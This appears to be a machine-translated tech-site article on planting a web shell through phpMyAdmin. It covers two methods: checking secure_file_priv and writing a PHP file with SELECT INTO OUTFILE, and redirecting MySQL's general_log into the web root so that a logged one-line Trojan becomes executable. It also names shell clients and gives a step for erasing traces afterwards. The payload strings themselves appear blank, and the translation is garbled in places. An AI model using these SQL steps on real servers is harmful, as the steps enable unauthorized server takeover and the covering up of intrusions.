Shulou(Shulou.com)06/01 Report--

This article is to share with you about how to get shell in phpmyadmin. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article.

1. Select into outfile is written directly. 1. Utilization conditions

Write access to the web directory is required to be able to use single quotation marks (root)

Know the absolute path of the website (phpinfo/php probe / error report, etc.)

Secure_file_priv has no specific value

2. Check the secure_file_priv value show global variables like'% secure%'

Introduction to secure_file_priv configuration:

Secure_file_priv is used to restrict the directory in which the load dumpfile, into outfile and load_file () functions have permission to upload or read files.

When the value of secure_file_priv is NULL, it means that import is not allowed for mysqld. When the value of secure_file_priv is / tmp/, it means to restrict the import of mysqld. | Export can only occur under / tmp/ directory, and cannot be lifted at this time. When the value of secure_file_priv has no specific value, it means that no restrictions are imposed on the import of mysqld | Export. Rights can be raised at this time.

My secure_file_ private value here is NULL, so I cannot import or export

The value secure_file_priv is a read-only variable and can only be modified through the configuration file. If the administrator has not configured it, then we cannot write to shell. Here I modify it in order to test whether it can be written.

Configure it in the configuration file my.ini of MySQL:

The value of the modified secure_file_priv is shown in the figure:

3. Write a sentence select''INTO OUTFILE' D:\\ phpStudy\\ PHPTutorial\\ WWW\\ a.php'

One point to note here is that the path needs to use "\"

Check the next root directory

Second, use the global log to write shell1 and view configuration

To check the log status of mysql, it is turned off by default, because the amount of this log is very large, which is a big overhead for resources.

SHOW VARIABLES LIKE'% general%'

General_log_file is the location where the log is saved

2. Enable general_log mode

The function of opening general_log: open it to record every command entered by the user, and save it in the file C:\ phpStudy\ MySQL\ data\ stu1.log, which is actually what we often say about the use of log files: after opening general_log, change the value of general_log_file to a custom php file under the default path of the site, then write a sentence Trojan through the log log, and then make further use of it.

Note here: before modifying the log path, the source path must be recorded in advance. After we get the shell, we have to restore the original path.

Set global general_log = on

Check again that the log has been opened, and then we can write shell to the root directory through the global log.

3. Modify the log directory to the shell address set global general_log_file='C:\\ phpStudy\\ MySQL\\ data\\ shell.php'

4. Write to shell

Because logging is enabled, all sql statements executed will be recorded in the log

Select''

Check the log and find that the sql statement has been recorded in the log. You can connect it directly with a kitchen knife or ant sword.

5. Erase traces set global general_log_file='C:\\ phpStudy\\ MySQL\\ data\\ stu1.log';set global general_log = off

Then use the log view command to find that it has been restored

SHOW VARIABLES LIKE'% general%'

The above is how to get shell in phpmyadmin. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.